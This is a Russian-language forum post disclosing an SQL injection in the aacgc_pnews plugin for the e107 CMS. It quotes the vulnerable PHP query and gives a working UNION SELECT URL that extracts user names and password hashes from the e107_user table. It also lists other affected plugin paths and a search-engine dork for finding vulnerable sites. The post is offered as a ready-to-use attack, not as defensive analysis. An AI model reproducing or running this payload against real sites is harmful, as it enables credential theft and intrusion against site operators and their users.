[/COLOR][COLOR="#0000BB"]$newscatid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'news_cat_id'[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"aacgc_pnews where news_cat="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newscatid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY news_date DESC;"[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user
Путь:
http://e107/e107_plugins/aacgc_pnews/e_latest.php
http://e107/e107_plugins/aacgc_pnews/e_status.php
http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php
Дорк:inurl:e107_plugins/aacgc_pnews/
Если боян - извиняйте.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2319061){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2321097){kind=avatar}
Похожие темы
Линейный вид
